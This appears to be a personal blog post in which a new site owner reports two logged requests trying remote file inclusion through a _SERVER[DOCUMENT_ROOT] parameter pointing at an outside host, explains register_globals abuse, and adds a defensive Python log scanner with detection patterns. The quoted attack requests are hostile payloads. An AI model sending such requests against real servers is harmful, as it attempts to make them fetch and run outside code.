Posted by Hans de Ruiter
EDIT (24/7/2008): Hot on the heels of this code-injection attempt comes another one (link).
Today, the following two lines appeared in the server log:
- 18.104.22.168 - - [23/Jul/2008:08:56:10 -0400] "GET /i-declare-this-site-to-be-fully-operational/index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 20342 "-" "libwww-perl/5.79"
- 22.214.171.124 - - [23/Jul/2008:08:56:19 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 8497 "-" "libwww-perl/5.79"
Whilst I am not an expert in PHP, these two entries are definitely an attempt to perform a code-injection exploit. If PHP code uses the parameters passed in the URL (the part of the URL after '?') without performing adequate checks, it is possible to trick the server into executing external code. The usual mechanism behind this pattern is PHP's register_globals setting: when it is enabled, a query parameter named _SERVER[DOCUMENT_ROOT] can overwrite the server's own document-root variable, and a script that builds an include() path from that variable will then fetch and run whatever file the URL points at. In the case above, the parameters passed in the URL would change the document root directory to "http://kingkool2.free.fr/ezupload/ips.txt?". Exactly what would happen after that, I do not know. However, one can expect it to be malicious.
The user agent string "libwww-perl/5.79" suggests that the request was made by a Perl script, most likely written for the purpose of finding and/or attacking susceptible servers. Fortunately, Silverstripe (the CMS that this site uses) has robust parameter checking, so the server simply returned a 404 "page not found" error and the hacking attempt did nothing. It is, however, a reminder to take web-server security seriously.
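As an added example (not part of the original post), here is a small Python scanner that flags the pattern seen in these two log entries from the defender's side: a query parameter that tries to override a PHP superglobal, a parameter value that is a remote URL, and the libwww-perl user agent. The sample log lines are the two from this post plus one constructed benign request; the log-format regex, the indicator wording and the function names are my own.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" access-log format; the regex is my own (constructed) and only
# captures the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# PHP superglobals; a request should never be able to set these (register_globals abuse).
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_REQUEST",
                "_SESSION", "_FILES", "_ENV", "GLOBALS"}
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)

# Constructed sample: the two entries from this post plus one benign request.
SAMPLE_LOG = [
    '18.104.22.168 - - [23/Jul/2008:08:56:10 -0400] "GET /i-declare-this-site-to-be-fully-operational/index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 20342 "-" "libwww-perl/5.79"',
    '22.214.171.124 - - [23/Jul/2008:08:56:19 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 8497 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [23/Jul/2008:09:00:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def rfi_indicators(line):
    """Reasons a combined-format log line looks like a remote-file-inclusion probe ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []                                      # unparseable line: nothing to judge
    reasons = []
    query = m.group("path").partition("?")[2]          # everything after the first '?'
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]                   # '_SERVER[DOCUMENT_ROOT]' -> '_SERVER'
        if base in SUPERGLOBALS:
            reasons.append(f"overrides superglobal via {name}")
        if REMOTE_URL.match(value):
            reasons.append(f"remote URL in parameter {name}")
    if m.group("ua").lower().startswith("libwww-perl"):
        reasons.append("libwww-perl user agent")
    return reasons

def scan(lines):
    """Map client IP -> accumulated reasons, for every line that trips an indicator."""
    hits = {}
    for line in lines:
        reasons = rfi_indicators(line)
        if reasons:
            hits.setdefault(LOG_RE.match(line).group("ip"), []).extend(reasons)
    return hits
```

Running scan(SAMPLE_LOG) reports only the two libwww-perl requests; the benign "page=about" request produces no indicators.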
Being new to maintaining a website, I have no idea whether this is a new or old attack. It certainly does not look overly sophisticated. A quick on-line search did not bring any useful information. If anyone knows more about this kind of attack, or where more information about webserver security can be found, I would be interested to hear from you. Either leave a comment here, or visit the contact page on this website.
Blog » Bot Attack!